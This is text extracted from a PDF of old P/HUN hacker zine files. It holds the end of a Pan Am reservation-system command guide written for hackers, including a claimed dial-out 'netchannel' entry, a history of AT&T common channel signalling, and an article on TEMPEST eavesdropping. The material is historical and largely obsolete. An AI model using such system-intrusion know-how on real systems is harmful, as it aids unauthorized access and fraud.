100 700 HA FAX-SSRNNSTPANN01 PA0040P19APR JFKLHR 1DAVIDSON/PLDR SEAT 3A If the
seat is already taken then the output will be: RE-CHECK AVAILABILITY/REJECTED DATA
FOLLOWS/4SSRNSSPANN01 PA0030 P19APRJUNJFKLHR 1DAVIDSON/PLDR SEAT 3A To print an
availability display (seats available) seat map must be displayed. Enter: >AC /S2 * AC - is the
availability cabin S2 - This is the segment 2 * - Display You will get something like this: -
PA0040P019APR JGKLHR 747-121 ZONE MAR AVAILABLE 9 * MOVIE SHOWN BETWEEN JFKLHR
A B C D E F G H J K P P 1 1 $ A* A* 2 2 C F $ A* 3 3 A* A* 05---------- As you can see from the
display that the requested seat is taken. The symbol use here is "$". Now lets get into the
explanation. PA0040P19APR - Flight/Class/Date JFKLHR - Board/Off points of the segment
booked 747-121 - This indicated the equiment used on the flight NMR - Zone requested "N" -
No smoking "M" - Movies "S" - Smoking "W" - Without movie AVAILABLE 9 - Total number of
seats still available to confirm. MOVIE SHOWN BETWEEN JFKLHR - Information on which sector
the movie will be shown. A* - Indicates that if given the option, confirm these seats to
passengers first. For e.g Seats 2B 3A B H J $ - This indicates that it is taken. e.g Seat 1 J 2 A -
Blank indicates that seats dont exists on the aircraft P - Seats behind a partition or bulkhead. F
- Special seating . People that require special seating ot handling C - Compulsory seat usually
assigned to F seats. 05-------- - This indicates the last row in the zone and /or compartment in
this case Premium, First Class. Some other commands: > AC/S1*S - Use this entry command if
passengers request smoking > AC/S1*W - Without movie ( No smoking is assured) > AC/S1*WS
- Without movie , Smoking specified. Part XII -------- When originating a PNR if a passenger
decides to cancel and book a different flight the seat confirmation will automatically be
cancelled as in this example (partial PNR display): 1.1BRESLIN/BMS 2.1CARTER/ASFR 1 PA 102
Y 26JUN JFKLHR 2100 0840 HA FAX-SSNSSTPAH02 PA102Y26Y26JUNJFKLHR 1IBRESLIN/BMS 1
CARTERASDR SEAT 33 AB Segment 1 cancelled X1 NEXT REPLACES 1 FLT//SEG FACTS
CANCELLED *R 1.1BRESLIN/BMS 2.1CARTER/ASDR HA FAX-SSRNSSTPA(XK)02
PA102Y26JUNJFKLHR 1BRESLIN/BMS 1 CARTER/ASOR SEAT 33 AB Should a passenger wish to
verify the seat description and/or location of his seat. There is an entry to display a seat map.
The entry is: >VSSPA106/31JULIAADLHR*27 VSS - is the Verify Seat Selection 27 - This is the
row. The response will be: PA0106 1AD/LHR 31JUL Y 747-121 ROWS 27 ZONES LAST ROW F/ 7C/19 Y/57 A B C D E F G H J K N M N M N M 21/NM N M N M N M 27/ N M N M N M | |____ |
8/17/2019 HACKER'S DEN BBS PAPER WORK GREAT CYBERPUNK.pdf
http://slidepdf.com/reader/full/hackers-den-bbs-paper-work-great-cyberpunkpdf 28/50
| | | no smoking Movie ROW Number Row 27 is a no-smoking seat, with a movie view, over
the wing Part XIII --------- This past will teach you all about hotels. I dont plan to go into details
on this but will just make you familiar. There are 4 catagories of hotels: 1. Intercontinental
(IHC) the Grand Metropolitan Hotel chain (XM Inventory stored in the system 2. Sheraton (XM
Inventory stored in the system) 3. Other hotels (Special Arrangement) (XP Availability ) 4.
Unlisted Hotels The XH and XM hotels have the actual inventory of thier rooms stored in thesystem and together with XP hotels the three types give you immediate availability. The hotels
with whom Pan Am has a booking agreement are listed in a City's Station Information. To
display the hotel for a city the input is: >KIBKKH BKK is the 3 letter city code and H stands for
Hotels. The response to this would be something like: BKK STATION INFORMATION HOTEL
INDEX 1000 KENYAN CONTINENTAL 1023 SHER BANKOK HOTEL 2351 * TAMARIN * 2342 ASIA :
etc The hotels are further identified in the hotel Index by a four digit number, their name and
location if other that the headline City it will be displayed as "* TAMARIN *" To determine of
the hotel is "XH", "XM" or "XP" and to display details about a hotel the input is: >KI[Four digits
Hotel Index] Here is what the response may look like: BKK HOTEL INFORMATION 1009 SIAM
INTERCONTINENTAL SIAM INTERCONTINENTAL SIOUT PLACE 4290 HACKERS ROAD * TEL000000 * SIAMICH XH XH 0923 LHTL XH0923 H C PVKGBD0N AS TL EP BHT EP P K D0N 04 00
01JAN-30DEC89 MODR SGLB 1840 DBLB 2000 TRPB 2390 : : : : GCR - JAN/JUN SGLB 1600 DBLD
1820 JUL/DEC SGLB 1600 DBLB 1820 NOTE LANAI ROOMS AND GROUND FLOOR ROOM ARE
ON PERMANANT REQUEST GUEST WILL BE MET AT AIRPORT BY HOTEL REPRESENTATIVE AND
ASSISTED TO HOTEL : : : LOCATION - CENTERS OF CITY OFF SIAM AQ. WITH EASY ACCESS TO
ALL SECTIONS OF THE CITY THREE MAIN FROM ROYAL BKK SPORTS CLUB NATIONAL STADIUM.
TRANSPORTATION - 35 MIN BY TAXI ARPT 25 MIN BY TAXI TO DOCK SERVICES- ROOM SVC 24
HRS LAUNDRY/VALET 24 HRS SPORTS - POOL,GYM ROOM,SHOOTING END The sixth line
contains the booking code (in this case XH0923) This display has been shortened to make
things easy. Hotels are booked in 2 ways: 1) Short Selling them using HOTEL booking code XH
........ >N1 DBLB XH1122-10OCT 15OCT MODR XM ........ >N2 SGLB XM1355-05MAR 12 MAR
MAXR XP ........ >N1 TWNB XP3087-02JUL 9JUL MODR 2) The other way is a Segment entry for
UNLISTED. >0 HTL PA NH1 ROM 1N23-JUL-OUT30JUL DBLB MODR DORA Part XIV --------
Personell who can access the Pan Am main computer may also be able to call out. I am not
positively sure about this because this info was recently given to me by a Pan Am employee.
Enter as follows: >HOLD NETCHANNEL 1 There may be many netchannels in the systems. If it is
occupied then it will give a "CHANNEL 1 BUSY" error. Then it will prompt you for a call out
password. This is different from your login password. Password : XXXXXXXXXX Then the
immediatly after that it will give a prompt "#" . This is where you will be able to input digits to
call out. # (317)5552322 Part XV [Misc] -------------- Airline Codes ------------- Pan Am, and all
other airlines, use a two-letter airline identification code for reservation and ticketing
purposes. There is no hard and fast rule as to how the two-letter code is derived. These codes
are assigned by IATA/ARC. This list contains some of the worlds major airlines. Hope this list
will come in handy. Airline Airline Code Airline Airline Code ------------------------------------ ----------
------------------------- AER LINGUS EI AEROFLOT SU AREOLINEAS ARGENTINAS AR AERO MEXICO
AM AIR AFRIQUE RK AIR CANADA AC AIR FRANCE AF AIR INDIA AI AIR NEW ZEALAND - INT. TE
ALASKA AIRLINES AS ALITILIA AZ ALOHA AILINES AQ AMERICAN AIRLINES AA AUSTRIAN
AIRLINES OS AVENSA VE AVIANCA AV BRITISH AIRWAYS BA BWIA INT. BW CAAC - CHINA CA
CATHAY PACIFIC AIRWAYS CX CHINA AIRLINES CI CONTINENTAL AIRLINES CO CP AIR (CANAIAN
PACIFIC) CP DELTA AIRLINES DL EASTERN AIRLINES EA EL AL LY GULF AIR GF HAWAIIAN
AIRLINES HA IBERIA IB INDIAN AIRWAYS CORP. IC JAPAN AIR LINES JL KLM ROYAL DUTCHAIRLINES KL KOREAN AIR LINES KE LACSA LR LAN-CHILE LA LUFTHANSA LH LIAT LI MEXICANA
8/17/2019 HACKER'S DEN BBS PAPER WORK GREAT CYBERPUNK.pdf
http://slidepdf.com/reader/full/hackers-den-bbs-paper-work-great-cyberpunkpdf 29/50
MX NORTHWEST NW OLYMPIC AIRWAYS OA PAN AM PA PIEDMONT AIRLINES PI QANTAS QF
SABENA SN SAS SK SAUDIA SV SINGAPORE SQ SOUTH AFRICAN SA SWISSAIR SR TAP (AIR
PORTUGAL) TP TWA TW UNITED AIRLINES UA US AIR AL VASP AIRWAYS VP VARIG RG
Conclusion ---------- Hope all have found this article of some intrest. My apologies for the
lenght. I have tried my best to include all major topics that may be usefull to the hacker. I
suppose now you know that booking flights is not that easy process. So next time please dontstart yelling at the poor sales agent for some minor problem. Using this system can be a lot of
fun. Although one can create a major havoc after infiltration. I urge you all not to do any of
that sort. This system is quite delicate and one should be very carefull when using it. All the
reverse command processes have been included in this article. I have purposely left out some
commands that proved to be harmfull to the system. Under no circumstances am I responsible
for this article's contents, for this serves only as an educational tool. I would like to thank Mr. C
of the Pan Am Security Division for all his help. If anyone wishes to get in touch with me, I can
be contacted at the Hacker's Den or at the Phoenix Project. Best of luck! Red Knight @ Phun
Magazine Inc. Hackers Den88 (718)358/9209 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-= = P/HUN Issue #3, Volume 2: Phile #7 of 11 = =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Common Channel (InterOffice)
Signalling: An overview
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD By Tubular
Phreak References: o - BTJ! o - AT&T comunications o - Tel-Network planing This article will
inform you of the stages CCS has gone through over the past years. CSC known originally as
Common Channel Interoffice Signalling was introduced back in 1976. Since its introduction it
has added datagram direct signalling and has been modernized by new digital and proccesor
technology and by delvelopments in software enginerring techniques. This prevents Blue
Boxing due to the fact that signals are carried over a different link than voice. CCIS net
improved its the old trunk signalling bettween SPC (Stored Control Program) toll switches
thereby increasing speed and its economical. The CCIS network was composed of what know
as STPs(Singal Trasfer Points) CCIS Network ------------ Region #1 + Region #2 ** + ** | + | | + |
| + | (SPC)------** **----(SPC) |________________________| ** - STP mated pair __ - Voice
Trunks | - Links + - Divider The Datalinks use 2.4 kb/s(kilobytes per second).In 1979 they used
1A switch was added. Later in 80 they added a special feature of direct signalling (datagram)
which operate at 4.8 kb/s. This capability provided the SPC machines with the neccesary
information through the CCIS Net.The allowed NCP (Network Control Points). The NCPs
connect directly to CCIS at certain STPs. The SPC machines quired the NCPs and receives the
instructions for the action in response.Therefore they became known as ACPs(Action Control
Points). This status if the CCIS provided 800 services and calling cards. In 1985 the siganlling
network added 2STPs and 56kb/s.This new network was called CCS7. This new method of
signalling used CCITT No.7 Protocol and with it new more efficient feature came like ISDN.
Archaic CCIS in 76' DDDDDDDDDDDDDDDDDD Before the introduction of CCIS, SF/MF
signalling method was in use. The SF was responsible in determining the idle/busy side state of
a trunk. 2600 Hz the idle trunk was removed when a call was to be placed on the trunk. Then
MF signaling was used to determine routing information to the distant end and when the party
answered the SF was removed from there side. Tandem switching was not economical and was
slow. As the introduction of SPC came about in which common control equipment was based
on electronic procedures, the overhead associated with the call setup became a more
dominant factor. MF/SF signaling was used until a toll switch ESS4 was introduced in 76'.
Therefore AT&T produced CCIS in assocation with the ESS4 toll switch. Signalling used adifferent link than voice. As mentioned above CCIS used 2.4/kb signalling links to transmit the
8/17/2019 HACKER'S DEN BBS PAPER WORK GREAT CYBERPUNK.pdf
http://slidepdf.com/reader/full/hackers-den-bbs-paper-work-great-cyberpunkpdf 30/50
signal. Due to the fact that one 2.4/kb could could provide for more than 2000 trunks, therfore
the a regional STP was put in place. Each STP was connected to several toll switches.Each
regional STP was connected to each of the distant STPs.Each STP was connected to its parner
which provided a path for connections between switches if there was a failure of distant STPs
The STPs in the network were provided by a portion of the processor associated with the 4A-
ETS(Electronic Translator Systems). Message routine within the STPs was performed by a bandand lable scheme that defined a virtual signalling circuit where 512 bands of 16 trunks coule be
accomodated. This allows 8192 voice trunks to be uniquely identified on a specific signaling
link. Direct Dialing Signalling(1980) DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD In 1980, a
direct signalling capability was added to the CCIS Network. This capability allwed messages to
be sent from a signalling point to any other signalling point in the network and supported a
new network architechture in which a portion if the switched network routing instruction
could be placed an a database shared by multiple SPC switches. These common databases
became known as network control points (NCPs). The SPC switches became known as action
points (ACPs). because they performed actions based on instructions from NCPs. This required
an inquiry-response in the Common Channel Interoffice Network. This communicationbetween ACPs and NCPs was performed by a new feature called Datagram Direct Signalling.
Unlike banded(trunk) signalling. This method of signalling directed messages on a destination-
routing basis through all the Singal Tranfer Points. Therefore the direct signalling messages
included a unique destination address that was used by the STPs to route the message based
on a table that associated destination addresses with physical points in the network. With this,
the CCIS network could direct messages to individual functions allowing the introduction of
unique services such as advanced 800 with features like time of day routing call prompter and
customer-controlled routing of traffic based on information stored at central databases. CCIS
Network Growth DDDDDDDDDDDDDDDDDDD As the AT&T network grew both in terms of SPC
swicthes and volume of traffic, it became necessary to augment the initial CCIS network
capability. First the number of STP pairs was increased from the initial 10 pairs to 16 pairs.
Three of the additional -airs were used as area STPs, which served the trunking needs of the
portion of the network. The remaining 3 STP pairs were associated directly with NCP pairs and
performed a direct signal funtion. In addition the message handling capacity of the network
was increased by deploying 4-8kb/s signalling links in place of the original 2.4kb/s links.STP
processing capacity was also increased as the original shared use of the ETS processor was
removed when the switch function at each STP location was transfered to a new 4 Elect- ronics
Switching System machines. The Impact of AT&T Divestiture on CCIS Network
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD On January 1, 1984 the
court-ordered AT&T divestiture became effective. Divestiture establishment local access and
transport areas (LATAs), which defined local markets areas. AT&T became an inter-LATA carrier
providing communication services between these LATAs. Under the divestiture agreements,
the STPs,NCPs,and interconnecting data links were assigned to AT&T. The minor use of these
facilities by the divestiture BOCs(Bell Operating Companies) was provided under
contract.Equal access to the inter-LATA carriers under divestiture was provided mostly by
MF/SF signalling. However a new multi-stage MF outpulsing arrangement was added to
forward the orginating number to inter- LATA carrier for billing and other purposes. Common
Channel Signalling 7 (1985) DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD During 1985, the
STP capability was enhanced by the introduction of 2STP based on the AT&T 3B20 duplex
(3B20D) processor and an associated processor inter- connect capability (PIC).In addition , 56-
kb/s digital facilities were provided between the STPs. The 2STP uses the CCITT SignallingSystem 7 protocol and provides message transfer part (MTP) function. The MTP can route a
8/17/2019 HACKER'S DEN BBS PAPER WORK GREAT CYBERPUNK.pdf
http://slidepdf.com/reader/full/hackers-den-bbs-paper-work-great-cyberpunkpdf 31/50
message reliably and qucikly from one point in the signalling network to any other point. The
resulting network has been named the CCS7 network. Initially, the CCS7 network was used to
augment the trunk signalling capabilities of the 1STP network using the embedded CCIS6
(ECIS6) protocol. ECIS6 interacts with CCS7 and allows switching systems connected to the
1STP network to communicate with other switches connected to the 2STP network.However
during this transitional period, all switching systems are connected to either the 1STP or 2STPlocations via 2.4 or 4.8 kb/s signalling links. CCS7 Destination CCIS (1986)
DDDDDDDDDDDDDDDDDDDDDDDDDDDD In 1986 the CCS7 network was expanded to include
direct signalling. This was done by adding new capabilities in the NCPs to allow 56-kb/s
connecting links and the ability to route direct-signalling messages within the 2STPs. For
transitional compatibility, a new destination CCIS6 (DCIS6) interworking protocol was
deployed. The 4ESS and 5ESS switches in the network will use the Integrated Services Digital
Network User Part (ISDN-UP) to control call setip and will have the capability to support ISDN
services. The ISDN-UP will use the services of the already deployed MTP and provide a broad
set of switched digital services. Evolution of NCP Serices to a Distibuted Architecture
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD Theincreasingly demanding requirements of call processing services such as the AT&T card service,
advanced 800 and software defined network (ISDN) have led to a steady evolution of the NCP
architecture toward more distribution. This is to increase versatility of the usage, flexibity of
growth and performance. At the same time we will be able to introduce more new services.
The orgianl NCPs introduced in 1980 consisted of AT&T 3B20 duplex processors and multiple
disk drives. The 3B20D handled all the fucntions including query processing database
admnistration and updates and signaling. The first step toward a distriuted NCP architecture
was in the signalling architecture. In 1985 the NCP incorporated a highly reliable processor
interconnect capability(PIC) with the same technology used in the 2STPs. It provides
communication between the CCS network and the NCP application databases in the 3B20D
host Signalling links from the STPs to an NCP terminate through link nodes(LNs) on the PIC.The
CCS query messages could access an NCP through the LNs and travel to the appropriate
database application in the 3B20D. Similarly query responses destined to the CCS network
could exit from the NCP through the PIC and the LNs The future NCP architecture will continue
to serve host to the NCP distributed enviroment and the PIC will remain the vehical for the
interprocess communication and signaling-link termination. To attain distributed query
processing, the NCP database architecture will feature the intergration of multiple transaction-
processing components. CCS7 Network Interconnection
DDDDDDDDDDDDDDDDDDDDDDDDDDDD With the potential for end to end signalling services
and the adoption of CCS7 standards, there is a growing effort to connect networks of different
carriers and different countries as well as various privately owned networks. It is expected that
in the future all North American networks will have CCS7. Therefore AT&T is currently involved
in defining standard CCS7 interface for use between netwroks. Initially, the new interface will
consist of 2STPs deployed in pairs.This network configuration assumes that interconnecting
will use designated STPs as gateways. The gateway STPs will be required to screen all incoming
message to prevent unauthorized use of network resources and services :-) Interconnecting
networks using designated STPs as gateways. Network boundary Network 1 (AT&T) | Network
2 _____ ______ | _______ |X | |X | | | |X | | | X |----------| X | |___|__| X | | |__X| |__X_|_|
| |__X_|_|X | X | | | X | X | | | SPC Switch | X __|___ | | / | X______|X | | | ___|___/ |
_____| X | |___|__|X | | |______| |__X_|_| | | X | | Gateway | |__X_|_| 2STP mated pair |
Gateway STP | mated pair | The figure below shows interconnection of a small network thatdoes not have STP gateway. Network boundary Small network 3 | AT&T CCS7 netowrk |
8/17/2019 HACKER'S DEN BBS PAPER WORK GREAT CYBERPUNK.pdf
http://slidepdf.com/reader/full/hackers-den-bbs-paper-work-great-cyberpunkpdf 32/50
______|_________%%%% / | %%%% / | +++++++++ / | + SPC +/ | +switch +X | +++++++++ X |
X | 2STP mated pair X______|_________%%%% | %%%% The same arrangement that is being
used domestically is currenlty being inves- tigated for application to the CCITT No. 7 message
transfer part/telephone user part (MTP/TUP) international network interconnection. However
because of differences between national networks, international interconnection is more
complex. With the implementation of ISDN-UP for international signalling in early 1990s, it isexpected that many of the existing domestic services will be extended to embrace the
international networks as well. CCS7 Support for ISDN Services
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDD Common Channel Signalling was designed for
signalling between network entities. ISDN protocols are designed for out of band signalling all
the way to the end user.Much of the current effort in ISDN is in defining protocols and
architectures for providing the out of band signalling from the end user premises to the
network.However to provide end to end service the network has to transport the end user's
out of band signalling, using CCS or other means. An important benifit of CCS7 is its inherent
ability to support feature transperancy i.e., allowing of passing of information that can only be
interpreted and used by end users.This capability can be attained by interworking the ISDNQ.931 protocol with the CCS7 ISDN-UP and extending ISDN to switched access users through
network interconnection. Methods of supporting CCS7 features transparency include: o
Message-associated user to user information o Temporary and permanent signalling
connections.Message associated user to user information could pass along with regualar CCS7
call control messages as opposed to using signaling connections specifically established for
that purpose. The transfer of transparent inoformation would generally be done after the
signalling connection (temporary or permanant) is established but message associted
transparent information could be transfered during the establishment and/or termination
phases of the signaling connection. Both AT&T and the regional BOCs are deploying ISDN
signalling in their networks Once in place, ISDN offers capabilities such as o Per-cali selsction of
services and bandwidth o Combined voice,data and even video on a single call o Calling-
number identification at the terminating end (for example, a digital display for the calling
number during ringing) o Sophisticated multimedia teleconferencing capabilities Futhermore
ISDN will be able to make it possible to add new features and improve the implementation of
the exsisting services such as support packet transmission and separation of the call/control
from user control information in ISDN. Potential CCS7 Network Enhancements
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD The future CCS network will probably be
configured as follows: 1) The ISDN-UP will be used throughout North America.As local carriers
adopt CCS7 network interconnect will provide for end to end digital services. The signalling
connection control part (SCCP) will be used to provide data capability for ISDN user to user
information. 2) The CCITT No. 7 protocol will be used internationally.First the telephone user
part (TUP) will provide basic call setup to countries that chose to use this protocol initially.
However because of its increased flexibility and support for digital services, the ISDN-UP will be
used to extend domestic ISDN services worldwide. 3) The interconnection with local exchnage
carriers as they expand their own CCS systems will enhance LATA access services and allow
new inter-LATA service. 4) AT&T services will evolve as the flexibility and capacity of the CCS7
of the protocol is utilized.The transaction capability and part (TCAP) will provide an effecient
protocol for direct-signalling query and responses, to support new databases and switch-based
services. The interworking of CCS7 with the Q.931 ISDN access protocol will allow end to end
services that are not possible with in-band signalling and will provide more effective and
innovative use of work. Conclusion DDDDDDDDDD The evolution os the AT&T commonchannel signalling system has been shown to be a critical part of the AT&T network and
8/17/2019 HACKER'S DEN BBS PAPER WORK GREAT CYBERPUNK.pdf
http://slidepdf.com/reader/full/hackers-den-bbs-paper-work-great-cyberpunkpdf 33/50
services. It has provided a cost effective means of providing flexibility in the marketplace. The
system is expected to evolve as new capabilities and need are indentified. Tubular Phreak
NUA! =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= = P/HUN
Issue #3, Volume 2: Phile #8 of 11 = =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-= WHO'S LISTENING --------------- By Capt. Zap Over the years, there has
been a number of different studies and discoveries that would alter personal and electronicsecurity over time. Devices able to "listen" to almost any form of communications have
become commonplace and are available "over the counter" from a varied number of sources.
Such units range from ten to fifteen dollars to expensive set-ups that employ microwaves and
lasers for the interception of almost any audio signal in the spectrum. But now with somewhat
needed protection from outsiders in reference to this problem, a number of solutions have
been put in place and global protection is insured in environments that have such need. But
the coverage of environment has had a a major change in protective attention now being place
on the actual electronic emmanations that are so common with todays standard electronic
apparatus. Electronic telephones, computers and communications networks, ATM's, radio and
television stations are just part of the overall electronic bubble that we have placed our societyinto with the hopes of providing better and faster methods to make daily life a bit easier. But
with such a fragile structure as the electronic bubble, we have new opportunities to discover
secrets never before possible due to the lack of technology. The same technology that helps us
in one way or another may also be helping others unbeknownist to those who are protecting
the environment in the first place. Signal leakage, either by design or by accident may lead to
total collapse of protective measures due to "wide open spaces" in the protective sphere. In
this particular paper, we will discuss the possible problems of common office technology may
bring in un-securing your installation. Our main focus will be in the areas concerning with the
emmanations or transmissions of "Tempest" frequencies. "Tempest", is the code name given
to a specfic area concerned with radio frequencies radiated by computing equipment by the
U.S. Dept. of Defense. This "concern" from such equipment dates back to the late 50's. The
concern ranged from the possible interception of "informational information" by sources other
than the intended users of such. The problem is more easily reconigized by the current
requirement of normal electronic equipment having to conform to emmision standards put
forth by the Federal Communications Commission in reference to the amount of electronic
"noise" generated by common standard technology so that such signals do not interfer with
other such pieces of equipment or their operations. To describe in simple terms, Tempest
frequencies are almost straight through from commerical AM stations to the upper reaches of
600 Mhz. They are generated or transmitted by any number of different common daily life
electrical and electronic systems. Your TV puts out one frequency, the stereo another, the
common electronic telephone, cordless phones still another, the microwave oven puts out
another and the wireless alarm does it to, and story goes on. So just as all of these pieces of
equipment emmit a signal, so does the personal computer. We will describe two possible
examples of such informational information and the abilty for some with directed intent to
cause potentially fatal results due to the use of directed "noise". It should be noted that the
current specifications for "Tempest" approved systems is considered classified by the DOD and
these specs were not available to the author. But if one was to look at the specs for normal
computing equipment and reduce the allowed emmission output by at least 50 percent, that
may be a realistic emmission standard accepted by the DOD. Example 1 "We had better
"Czech" this out! ------------------------------- In 1987, a very strange occurence concerning forgein
nationals from an Eastern bloc nation entered this country in a large camper-like truck via theborder checkpoint at Niagra Falls, New York. The visitors numbering 4 or 5, were in the country
8/17/2019 HACKER'S DEN BBS PAPER WORK GREAT CYBERPUNK.pdf
http://slidepdf.com/reader/full/hackers-den-bbs-paper-work-great-cyberpunkpdf 34/50
under tourist visa's and were reported to be representives of the countries automobile and
truck industries here on a promotional tour to garnner interest in their exportable products.
The one problem with the "visitors" is that none of them had any connection with such
industries in their home country. In fact, the visitors were far from what they supposedly
represented. The group descripton read like a Whos' Who of mid-level management of Eastern
bloc intelligence operations. The group reportedly consisted of a nuclear physists, a specialistin aerial map-making complete with a small ultra-light powered aircraft, a communications and
computer expert and two communist party officals. Over a 5 month period, the group was
reported to have visited 17 states looking at 40 to 48 sites dealing with military and defense
contractor sites. The vehicle and its occupants were reportedly followed by over 100 agents of
the FBI, NSA, Secret Service and State department and at least one over flight of a military
reservation was reported. Even though the overflown site was not identified, one site was. This
site, was the "sensitive" naval communications center for the Pacific Fleet located in San
Diego. It was reported that the truck and it's occupants were parked a few hundred yards from
the facility for several days and according to law, were in no violation of any current statute at
the time. The group was also at or around at the 2800 acre North Island Naval Air Stationbased in Coronado, California. The spokesman for the base stated that you could not see much
of anything going on except for the take-off and landing of aircraft which you could see from
almost any place. Common sense states that you do not have to be inside the facility in either
a physical or electronic standpoint to collect information. You can park in any lot or street
close enough to your supposed target and stick up your antennas. No property violations, no
photo restrictions to comply with, no restrictions at all because you are sitting in a public
place, parked or having coffee with your "ears" on. A good example of such parking was
reported in a paper published in Computers and Security 4, titled Electromagnetic Radiation
from Video Display Units: An Eavesdropping Risk? by William Van Eck, copyright 1985. He
stated that when they were conducting their experiments in the open on public roadways,
with a van and antenna system that was quite noticable, no one asked what they were doing
or had any thought about the time spent doing such things. The end of this particular story is
as follows: At the end of the suspect journey, the truck was searched at the Nosgales, AZ
border checkpoint and was then released. Nothing considered illegal was found in the search
and the truck and it's passengers were released and entered Mexico. Now even though the
truck was suspected of performing passive "eavesdropping" operations, the federal goverment
had no legal right to hold either the truck or crew. And the possible intercepted information
was then released from the country. It should be noted that the truck could have a number of
standard "off the shelf" items. These items could have consisted of 2 general coverage radios
with a combined tuning range between 100 Khz to 2 Ghz., an IBM personal computer clone,
various cheap video and signal enhancment equipment, printers and modems, and other such
complement devices. None of the equipment would be any "James Bond" type of gear and the
basic suspected set-up would cost the operation less than 10,000 dollars if budgeted correctly.
And if possible, use of other simple off the shelf type radios like the 200.00unit available from
Radio Shack that covers 150 Khz to 30 Mhz is not at all unheard of due to some budget
constraints. And since most emmanated signals generated by logical devices are within
commerical AM and FM frequencies, the use of a standard auto radio antenna would suffice to
use as a pickup. So the major concern with such actions comes from the ability of simple
equipment to detect, register and decipher such emmanations with relative ease. The ability of
such persons and possible actions able to penitrate the electronic fog of our society should be
a clear distinct warning to those concerned with security in general. In addition to all of theabove, the author contacted various federal goverment agencies in reference to this
8/17/2019 HACKER'S DEN BBS PAPER WORK GREAT CYBERPUNK.pdf
http://slidepdf.com/reader/full/hackers-den-bbs-paper-work-great-cyberpunkpdf 35/50
information and was told that they had no knowledge of such an investigation and could not
tell where such supposed counter-intelligence operations were controlled from or who to
contact in reference to supplying such information. Current "Freedom of Information Act"
requests for information concerning this supposed federal project are underway. An
interesting note about filing the forms for access to information about the Czech incident is
described to give guidance to others who may wish to investigate this incident and seek helpfrom such elected officals. When the papers were filed for the desemenation of information
through the Freedom of Information Act, members of the U.S. Senate and Congress were
contacted in reference to this matter. The first contact was placed through Senator Arlen
Spectors office in Philadelphia, Pa. We were first rebuffed by persons who refused to identify
themselves with the statement " I am sorry, but that information is covered by the 1974
Privacy Act, Click! Well we called back and informed the person who answered the call of the
situation and then were re-connected and informed them that Czech citizens were not
covered by US privacy laws and that there was no invasion of privacy. They called the FBI and
asked if they were the way such things were handled, and were told yes or no. But they had no
answer for any question put forward and said " They were sorry!", but we don't know how tohelp you!. Our second contact to Senator Spectors office in Philadelphia as in essance like the
first, they would not assist nor would explain why they took this position in the first pace.
During our second contact we spoke to a Miss or Mrs. Anderson. She stated that such requests
were not in the senator's perview and they could not assist in this matter. When asked why it
as not in the senators preview, we were informed that they do not have to give a response.
When asked for an offical response, we were informed that no offical response would be
given. But as a side note, Senator Hienz office said that they would forward the requests to
Spectors office in Washington. One other thought on this matter: I am sure that if the good
senator wants to get some information, his staff jumps through hoops to get him all he wants
and then some! A pre-publish copy of this article will be delivered so that even he (or his office
staff, who were of no help at all due to a tough question placed to them by a citizen) may learn
of what may be going on in his own country. So much for gaining assitance from a senator who
sits on a judical panel. We visited next the office of John Hienz. Again, funny looks about the
Freedom of Information Act and they hemmed and hawed at the questions presented. They
took the requests and said they would try and see what could be done. Our final visit was to
our local congressman, Tom Foglietta, whos office still stated the 1974 Privacy law, but took
the requests when presented in person. It pays to visit your elected representives working
areas. So much to do (if you work there!) in a goverment office. Other federal agencies
including the FBI were most helpful in complying with the requests. Of course we found this
most interesting. Is it so they could possibly reclassify the information to a "Secret" status
instead of what it may be now. Other agencies contacted in reference to FOIA requests include
the CIA, NSA, NRO, Customs, State Dept., Army Automated Intelligence and Military Police, FBI,
FCC . Example 2 "Breaker, Breaker, Wally Gator!" ----------------------------- During the 70's, the
United States had a short term love affair with the Citizens Band radio. What were once clean
channels were suddenly crammed with persons who wanted to be able to communicate with
any number of persons who also had such capabilities. Suddenly, everyone had one of these
radios in the home or car and some were know to have both. Numerous persons ran such rigs
with varing illegal applications ranging from a lack of license to the intense over powering of
such stations. To give a brief explanation of CB's, we will keep it simple. CB's transmit in the
upper reaches of 26 Mhz to 27 Mhz or 11 meters band. CB's are allowed to operate with a
maximum output of 5 watts radiated power. Of course this limited power was not sufficent forsome users and the use of linear amplifiers or "heat" was commonplace. Stations were known
8/17/2019 HACKER'S DEN BBS PAPER WORK GREAT CYBERPUNK.pdf
http://slidepdf.com/reader/full/hackers-den-bbs-paper-work-great-cyberpunkpdf 36/50
to be transmitting 50 to 2 thousand watts to their antennas which in turn would increase such
signals to a power of over 2 hundred thousand watts. Some operators were known to show
the intense power outputs with the use of flourescent lightbulbs and the abilty to "light" these
tubes from a distance without electrical connections with the amplified radiated power of
their antennas. Some persons were known to have full control of channels in their respective
areas and would blank out anyone who would not conform to the channels establised rules orprocedures. Others set-up pirate stations that would broadcast commerical music for all to
hear complete with news, weather and sports. Such actions would tie up frequencies and
caused a general crackdown by the FCC in the later years. But the problem still continues and
the FCC has all but given up on the idea of any enforcement of regulations concerning such
operations on the 11 meter or 27 Mhz band. The craze of CB's left the general populace by the
late 70's and was back in the hands of those who would truely use such radios. Those who
would use such radios best known, would be the persons called truckers since that is what
they do. They "truck" goods from one place to another and are concerned with time and travel
conditions as most of us are. The truckers always had some "heat" on-board for those times
when they could not get their signal "out". It was and still is considered an insurance policy bymost who have this technology and is widespread in its use. Now over time, with the
continued expansion of these radios, the truckers began to switch to marine band radios in the
10 meter band and were conversing just as before. Since the 10 meter band would permit such
radios and the increased power output, the switch to 10 meters was only a matter of time.
